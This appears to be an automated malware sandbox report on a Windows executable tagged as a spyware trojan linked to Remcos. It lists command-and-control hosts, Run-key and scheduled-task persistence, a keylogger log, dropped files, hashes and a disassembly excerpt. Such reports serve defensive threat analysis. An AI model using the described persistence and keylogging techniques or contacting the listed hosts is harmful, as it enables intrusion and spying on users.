                                                                                                    https://bitbucket.orgcsc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://bbuseruploads.s3.amazonaws.comcsc.exe, 00000003.00000002.4046058134.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://geoplugin.net/json.gpdJccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.hdsentinel.comcsc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
3.5.24.44 | s3-w.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
181.131.217.244 | navegacionseguracol24vip.org | Colombia | 13489 | EPMTelecomunicacionesSAESPCO | false
185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1573906
Start date and time:2024-12-12 18:00:28 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 11m 9s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:4JwhvqLe8n.exe
renamed because original name is a hash value
Original Sample Name:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9.exe
Detection:MAL
Classification:mal100.troj.spyw.expl.evad.winEXE@6/5@5/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 75%
• Number of executed functions: 222
• Number of non-executed functions: 59
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197, 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ccrdlld.exe, PID 7120 because there are no executed function
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 4JwhvqLe8n.exe
Time | Type | Description
18:01:55 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
18:02:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
18:02:12 | Task Scheduler | Run new task: ccrdlld path: C:\Users\user\AppData\Local\Temp\ccrdlld.exe
18:02:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe
18:02:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            AMAZON-AESUShCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.25.23
                                                                                                                            http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.comGet hashmaliciousUnknownBrowse
                                                                                                                            • 44.221.84.105
                                                                                                                            phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 54.146.214.76
                                                                                                                            https://cdn.iobit.com/dl/driver_booster_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 35.174.38.64
                                                                                                                            jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 54.204.149.181
                                                                                                                            jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 34.199.141.162
                                                                                                                            427c7bdc-ea02-97de-e5ef-a2c58c2d0a48.emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 54.224.241.105
                                                                                                                            Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 34.196.82.111
                                                                                                                            https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                            • 44.216.196.47
                                                                                                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 54.157.203.139
                                                                                                                            EPMTelecomunicacionesSAESPCOfIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 181.131.217.244
                                                                                                                            AMAZON-02USigmbio.pdfGet hashmaliciousUnknownBrowse
                                                                                                                            • 52.219.93.250
                                                                                                                            full.exeGet hashmaliciousQuasarBrowse
                                                                                                                            • 18.231.236.52
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.50
                                                                                                                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.166.143.49
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.166.143.49
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.48
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.48
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 54.231.193.17
                                                                                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 185.166.143.49
                                                                                                                            ATOM86-ASATOM86NLfIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0efull.exeGet hashmaliciousQuasarBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.5.24.44
                                                                                                                            • 185.166.143.49
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exefIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                              3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                  pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                    hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                      C:\Users\user\AppData\Local\Temp\ccrdlld.exefIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):488
                                                                                                                                                Entropy (8bit):3.256825663620976
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:6lbUKKecmlbUrAbWFe5UlbtlbjbWFe5UlbWjclbWJbW+:66ccm6r0WqUzxWqU5kW+
                                                                                                                                                MD5:3DC0C40BAF064DBD3074360F17C95B64
                                                                                                                                                SHA1:7DC25E99284D47E05B94A769D009D64D18AB5506
                                                                                                                                                SHA-256:29F2E67B4D15A01A7B0A8790A4B14A12EACB793F7E768AA9BEB4E756F493E993
                                                                                                                                                SHA-512:1028E01978B2E9F881347D6BE4D59347A6473EFF062E305977A989AA927472E9A14B417A27ED73D66B251328839E8575A48AAE36F5808D3DAF266CAE1869A729
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:....[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.3.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.3.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.4.2. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.4.5. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.5.1. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.2.:.0.2.:.5.1. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):963
                                                                                                                                                Entropy (8bit):5.018384957371898
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkD:qlupdVauKyGX85jvXhNlT3/7CcVKWro
                                                                                                                                                MD5:0F26B79167E7BB356D7AB35E01B90A0E
                                                                                                                                                SHA1:4655C51903490C3536D4A5D0885D17267526E56C
                                                                                                                                                SHA-256:0E7A0C4D81A5F0AB568FCF592D369FF0007E1D5DF1130327353347C79BD2BCA6
                                                                                                                                                SHA-512:B7A8B80DCC0463F5C89DC6F1D8F89E7C570494B9A55A9A05B278371ABDE2D74D3F0A76163A836E8FD7AF94F37A167B9807C441A1C19EF4F04408B509D0204376
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):4054528
                                                                                                                                                Entropy (8bit):6.41931526899004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:swsFCTOMRebywOIYAXu14+MFL3MrI+rtZg+VRWKldQwsRwRHa0eQkxHodWYPWIRL:Psukx/cRAVyoqjU9sVK+
                                                                                                                                                MD5:27650AFE28BA588C759ADE95BF403833
                                                                                                                                                SHA1:6D3D03096CEE42FC07300FB0946EC878161DF8A5
                                                                                                                                                SHA-256:CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
                                                                                                                                                SHA-512:767CEB499DDA76E63F9ECEAA2AA2940D377E70A2F1B8E74DE72126977C96B32E151BFF1FB88A3199167E16977B641583F8E8EA0F764A35214F6BC9A2D2814FDC
                                                                                                                                                Malicious:true
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: fIPSLgT0lO.exe, Detection: malicious
                                                                                                                                                • Filename: 3XSXmrEOw7.exe, Detection: malicious
                                                                                                                                                • Filename: ozfqy8Ms6t.exe, Detection: malicious
                                                                                                                                                • Filename: pPLwX9wSrD.exe, Detection: malicious
                                                                                                                                                • Filename: hCJ8gK9kNn.exe, Detection: malicious
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):979567142
                                                                                                                                                Entropy (8bit):0.05590638890163692
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:
                                                                                                                                                MD5:599A413EE85CC3A8A223C83230DC8D54
                                                                                                                                                SHA1:5D6E856794B3AF1D96AB0319350856BD5BCE4BE6
                                                                                                                                                SHA-256:CAAB3F404A2CE6D4EFCBFEC97172CBC17D2E4A8D128F4BB42BBE677947DBB425
                                                                                                                                                SHA-512:6EF58AC644BE1B60F2E65851CEF60E81D772212CB9B127613DDB77A941B555868AD3B616B173574D2129AC5F874650D485E520AE62287C939B5581C9E6D0CC32
                                                                                                                                                Malicious:false
                                                                                                                                                Joe Sandbox View:
• Filename: fIPSLgT0lO.exe, Detection: malicious
• Filename: 3XSXmrEOw7.exe, Detection: malicious
• Filename: ozfqy8Ms6t.exe, Detection: malicious
• Filename: pPLwX9wSrD.exe, Detection: malicious
• Filename: hCJ8gK9kNn.exe, Detection: malicious
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4JwhvqLe8n.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):979567344
                                                                                                                                                Entropy (8bit):0.03687271612861637
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:
                                                                                                                                                MD5:562A60041F05642EC1385D4485B2367A
                                                                                                                                                SHA1:73084B32C52D7B55DEAC6F80C550F2F6B1E43998
                                                                                                                                                SHA-256:7B4BE96B41FCEAC779AFE4F8A90E29727DC069E2ABAB8978652A9B5A5176D884
                                                                                                                                                SHA-512:8E918EA5F916947F3FDD4F81900CAA6B969CD5D3F062B5928B72A4BA1EEE1B5DFABDFE7DA2F8EA5A3DB4FED261907365F7456CB2D428852B04DC2EA4EDB9BF7F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8)4.|HZ.|HZ.|HZ.g..jHZ.g...HZ.g..GHZ.u0.qHZ.|H[..HZ.g...kHZ.g...}HZ.g..}HZ.Rich|HZ.........................PE..L......d.................T... &......X.......p....@...........................(...........@.....................................x....@...s%..........~..`(......."...r..............................P...@............p...............................text....`.......T.................. ..`.rdata.......p.......X..............@..@.data....@..........................@....rsrc....s%..@...t%.................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):6.05725668491521
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:4JwhvqLe8n.exe
                                                                                                                                                File size:2'652'160 bytes
                                                                                                                                                MD5:b58e300ca8077adc4094e9044bcdbbc8
                                                                                                                                                SHA1:abc3b46626e17e22b744b9fe44833919255121ce
                                                                                                                                                SHA256:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9
                                                                                                                                                SHA512:abfae0cd1d5b9a1475449f1f4ece4c72d7731bf1e01e721ebf31e656c65406b430f87b65334a9e9150530357f58b6ea7d31b5d55b4ae9800ad64d9bdc5998ea3
                                                                                                                                                SSDEEP:24576:Mo48sSW8kD+xpdPChyjn4CqnlwRsdkoAgEsJUtDkMvF9Am:p4bIk6qhyL4osdkovEsJUFxPJ
                                                                                                                                                TLSH:45C56CC6D940C847F97A19FDE91A78F0422F3FB9D93EA06B9B907F2DB231AC10415952
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8)4.|HZ.|HZ.|HZ.g...jHZ.g....HZ.g...GHZ.u0..qHZ.|H[..HZ.g...kHZ.g...}HZ.g...}HZ.Rich|HZ.........................PE..L......d...
                                                                                                                                                Icon Hash:070b71b030211f88
                                                                                                                                                Entrypoint:0x415891
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x64ECE0A8 [Mon Aug 28 18:00:08 2023 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:1
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:1
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                Import Hash:fba9a06cd911d183f0aec1159c439b07
                                                                                                                                                    Instruction
                                                                                                                                                    call 00007F6FF874C94Dh
                                                                                                                                                    jmp 00007F6FF8745C0Eh
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    mov edx, dword ptr [esp+0Ch]
                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                    test edx, edx
                                                                                                                                                    je 00007F6FF8745DEBh
                                                                                                                                                    xor eax, eax
                                                                                                                                                    mov al, byte ptr [esp+08h]
                                                                                                                                                    test al, al
                                                                                                                                                    jne 00007F6FF8745D98h
                                                                                                                                                    cmp edx, 00000080h
                                                                                                                                                    jc 00007F6FF8745D90h
                                                                                                                                                    cmp dword ptr [00432CC0h], 00000000h
                                                                                                                                                    je 00007F6FF8745D87h
                                                                                                                                                    jmp 00007F6FF874C9B2h
                                                                                                                                                    push edi
                                                                                                                                                    mov edi, ecx
                                                                                                                                                    cmp edx, 04h
                                                                                                                                                    jc 00007F6FF8745DB3h
                                                                                                                                                    neg ecx
                                                                                                                                                    and ecx, 03h
                                                                                                                                                    je 00007F6FF8745D8Eh
                                                                                                                                                    sub edx, ecx
                                                                                                                                                    mov byte ptr [edi], al
                                                                                                                                                    add edi, 01h
                                                                                                                                                    sub ecx, 01h
                                                                                                                                                    jne 00007F6FF8745D78h
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    shl eax, 08h
                                                                                                                                                    add eax, ecx
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    shl eax, 10h
                                                                                                                                                    add eax, ecx
                                                                                                                                                    mov ecx, edx
                                                                                                                                                    and edx, 03h
                                                                                                                                                    shr ecx, 02h
                                                                                                                                                    je 00007F6FF8745D88h
                                                                                                                                                    rep stosd
                                                                                                                                                    test edx, edx
                                                                                                                                                    je 00007F6FF8745D8Ch
                                                                                                                                                    mov byte ptr [edi], al
                                                                                                                                                    add edi, 01h
                                                                                                                                                    sub edx, 01h
                                                                                                                                                    jne 00007F6FF8745D78h
                                                                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                                                                    pop edi
                                                                                                                                                    ret
                                                                                                                                                    mov eax, dword ptr [esp+04h]
                                                                                                                                                    ret
                                                                                                                                                    mov edi, edi
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                    push ebx
                                                                                                                                                    xor ebx, ebx
                                                                                                                                                    cmp ecx, ebx
                                                                                                                                                    jbe 00007F6FF8745D9Dh
                                                                                                                                                    push FFFFFFE0h
                                                                                                                                                    xor edx, edx
                                                                                                                                                    pop eax
                                                                                                                                                    div ecx
                                                                                                                                                    cmp eax, dword ptr [ebp+10h]
                                                                                                                                                    jnc 00007F6FF8745D91h
                                                                                                                                                    call 00007F6FF874484Eh
                                                                                                                                                    mov dword ptr [eax], 0000000Ch
                                                                                                                                                    xor eax, eax
                                                                                                                                                    jmp 00007F6FF8745DC3h
                                                                                                                                                    imul ecx, dword ptr [ebp+10h]
                                                                                                                                                    push esi
                                                                                                                                                    push edi
                                                                                                                                                    mov esi, ecx
                                                                                                                                                    cmp dword ptr [ebp+08h], ebx
                                                                                                                                                    je 00007F6FF8745D8Dh
                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                    call 00007F6FF874746Eh
                                                                                                                                                    Programming Language:
                                                                                                                                                    • [ASM] VS2010 SP1 build 40219
                                                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                                                    • [C++] VS2010 SP1 build 40219
                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                                                    • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2f4c4 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x34000 | 0x2573d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc7e00 | 0x2860 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc8000 | 0x22fc | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x272b0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2c150 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x27000 | 0x1bc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x26000 | 0x25400 | 322bee9ae1b5d94b5b2fb7fb5a6af11d | False | 0.5403143351510067 | data | 6.613060638092758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x27000 | 0x9000 | 0x9000 | 81a1c90b898ffbd833b6d78098a5839e | False | 0.3275282118055556 | data | 4.397029732712187 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x30000 | 0x4000 | 0x1c00 | 84f180ff30a786befa816e36aabd66fc | False | 0.2925502232142857 | data | 4.000425788178025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x34000 | 0x2573d0 | 0x257400 | 922980e07f33f2cbed318f9698257843 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x34924 | 0x1d4e8 | Device independent bitmap graphic, 200 x 200 x 24, image size 120000, resolution 3780 x 3780 px/m | | | 0.651107964011996
RT_BITMAP | 0x51e0c | 0x9ea4 | Device independent bitmap graphic, 483 x 21 x 32, image size 40572, resolution 3582 x 3582 px/m | | | 0.36169112577563284
RT_BITMAP | 0x5bcb0 | 0x50138 | PC bitmap, Windows 3.x format, 41447 x 2 x 40, image size 328097, cbSize 327992, bits offset 54 | | | 0.9418796799921949
RT_ICON | 0xabde8 | 0x3a48 | Device independent bitmap graphic, 60 x 120 x 32, image size 14880 | | | 0.1794906166219839
RT_ICON | 0xaf830 | 0xcd63 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8217158941782841
